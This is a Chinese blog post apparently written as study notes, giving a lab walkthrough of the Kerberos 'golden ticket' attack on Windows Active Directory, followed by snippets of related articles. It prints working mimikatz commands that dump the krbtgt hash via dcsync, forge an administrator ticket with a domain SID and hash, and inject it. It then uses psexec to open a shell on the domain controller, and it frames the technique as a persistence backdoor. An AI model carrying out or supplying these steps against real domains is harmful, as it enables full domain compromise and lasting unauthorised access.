域中黄金票据

最新推荐文章于 2024-08-29 10:55:48 发布
最新推荐文章于 2024-08-29 10:55:48 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 内网渗透
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/100745898
版权

黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。

krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。

0x00 金票据利用条件:

  • 域控中krbtgt账户NTLM密码哈希
  • 域中的sid值
  • 一台域中主机

与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限,因为常见的在域中管理员知道自己被入侵了 往往只是简单的修改域管的账号 恰恰krbtgt缺被忽略…

0X01 过程

域控08 r2 ip:192.168.117.3
在这里插入图片描述
域内主机08 r2 ip:192.168.117.111
在这里插入图片描述

1. 在域控中利用mimikatz导出 krbtgt 的ntlm hash

lsadump::dcsync /domain:top.pentest.top /user:krbtgt"

mimikatz.exe privilege::debug "lsadump::dcsync /domain:top.pentest.top /user:krbtgt" exit >> log.txt

在这里插入图片描述
2. 获取域的sid,在域成员机中whoami /user 注:不需要末尾的4个数字1128 那只是账号的标识符 比如administrator后面为500

在这里插入图片描述

3. 使用mimikazt执行

一次性
mimikatz.exe "kerberos::golden /user:administrator /domain:top.pentest.top /sid:S-1-5-21-2174377853-1962599352-171107088 /krbtgt:ae8366a5c4ba8d4b9932fbb20c6c0b1d /ptt" exit


多步骤
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-2174377853-1962599352-171107088 /krbtgt:ae8366a5c4ba8d4b9932fbb20c6c0b1d /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

参数解析:
kerberos::golden:创建黄金票据
user:administrator伪造的用户
domain域名:top.pentest.top
sid:id域中sid
krbtft:hash在域控中导出的hash
ppt:将伪造的票据插入到内存中以供使用

在这里插入图片描述
在这里插入图片描述
还可以直接获取一个域控的CMD

psexec.exe \\WIN-CKTOM35R6U0 cmd

0X02 总结:

1: 域成员机不能为03与xp及一下 否则mimikatz导入票据时会出错
2: 最后连接为域控计算机全名 不能为IP地址

学习借鉴:https://blog.csdn.net/ws13129/article/details/89648576

小鱼儿waha
关注
专栏目录
权限维持—黄金票据和白金票据
lza20001103的博客
09-26 1358
黄金票据和白金票据 前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景都可以进行此类攻击 一、Kerberos协议 首先了解下Kerberos协议,windows认证常用协议,也是黄金票据和白银票据的攻击场景 大致流程如下:
[渗透测试笔记] 49.渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4619
Kerberos认证协议 《信息系统安全概论》书对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是控制器;AD是活动目录。 DC有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建时系统自动创建的,在整个kerberos认证会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了所有用户的密码Hash和白名单。只有账户密码
【内网学习笔记】28、黄金票据
TeamsSix 的 CSDN 空间
09-27 523
0、前言 RT 在利用黄金票据(Golden Ticket)进行 PTP 票据传递时,需要先知道以下信息: 伪造的管理员用户名 完整的 SID krbtgt 的 NTLM Hash 或 AES-256 值 其 krbtgt 用户是自带的用户,被 KDC 密钥分发心服务所使用,属于 Domain Admins 组。 在环境,每个用户账号的票据都是由 krbtgt 用户所生成的,因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值,就可以伪造内任意用户的身
内网横向——渗透之黄金票据复现
ytdd66的博客
04-03 1394
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其KDC服务默认会安装在一个,而Client和Server为内的用户或者是服务,如HTTP服务,SQL服务。在KerberosClient是否有权限访问Server端的服务由KDC发放的票据来决定。
黄金/白银票据制作
最新发布
weixin_67925097的博客
08-29 1001
免责声明:该文章仅提供学习交流,若用于违法行为与本人无关。
权限维持——黄金票据和白金票据
cxrpty的博客
04-03 2008
获得控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统的任意用户 实验条件: 1.名称 2.的SID 值 3.的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
渗透之(黄金票据利用)
cj_Hydra's Blog
02-13 3007
前言: 这里先介绍下Kerberos协议: Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发心其K...
权限维持】-黄金票据
qq_41617902的博客
11-07 1363
Windows权限维持-黄金票据
实战黄金票据的制作
blue_fantasy的博客
01-29 5237
Text. 0x00 前言 当控制了一台控服务器的情况下,为了不打草惊蛇又为了长时间控制,可以考虑使用黄金票据进行权限维持。 目前以控制一台内成员机器WIN2016,ip:10.0.10.111 无杀软 一台控机器WIN2019,ip:10.0.10.110 有杀软 名:vulntarget.com 管:vulntarget\administrator 管密码:Admin@666 通过之前的攻击,我们拿到了管理员的账号密码,...
AD渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 810
过两天研究明白kerberos协议里每次发包各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道的tgt验证用户k
内网渗透--黄金票据
yc的博客
05-23 1787
渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向控制器上的KD
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1128
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
渗透:黄金票据
ClarkAlbert的博客
10-29 1582
渗透:黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
黄金票据复现
cxy020的博客
04-03 785
通常这将是根Enterprise Admins组的“S-1-5-21-1473643419-774954089-5872329127-519”值。/ groups(可选)---用户所属的组RID(第一组是主组)。/ sid ----的SID,在这个例子:“S-1-5-21-1473643419-774954089-2222329127”使用黄金票据可以在没有AS-REQ或AS-REP(Kerberos认证的前两步)通信的情况下,向控制器请求服务票据。/ id(可选) - 用户RID。
复现黄金票据
moyuan_4s的博客
04-03 460
具体来说,当用户进行身份验证时,KDC 会发出一个票据授予票据(TGT),其包括一个唯一的会话密钥和一个时间戳,该时间戳指定该会话的有效时间(通常为8或10小时)。当攻击者获取到内 krbtgt 帐户的 SID 和 HASH,就可以随意伪造内管理员用户,再加上帐户 krbtgt 的密码基本不会更改,即使管修改了密码,攻击者依然可以通过黄金票据获取管理员权限。在环境黄金票据是一种特别危险的攻击,是控权限失陷的特征。1. 信息收集:获取目标的相关信息,如名、控制器的 IP 地址等。
权限维持-渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1691
Golden Ticket (黄金票据) 简义 : 在拥有普通用户权限和 krbtgt账号的hash的情况下,获取管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是内任何账号,包括管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT的信息,然后处理TGT并颁发服务票据。 内存插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
「运维有小邓」AD常见攻击之——黄金票据
运维有小邓
03-28 2544
“Golden Ticket Attack(黄金票据)”是一个特别丰富多彩的(如果你会原谅双关语)名称,用于特别危险的攻击。这个绰号来自罗尔德·达尔(Roald Dahl)的书 查理和巧克力工厂, 其一张金票是令人梦寐以求的通行证,可以让其所有者进入威利旺卡戒备森严的糖果工厂。同样,成功的Golden Ticket(黄金票据) 攻击使黑客能够访问组织的整个 Active Directory
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 3200
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有内的最高权限,攻击者可以访问和控制所有内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
内网黄金票据和白银票据的区别
05-14
在内网黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络获得管理员级别的访问权限,因此它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值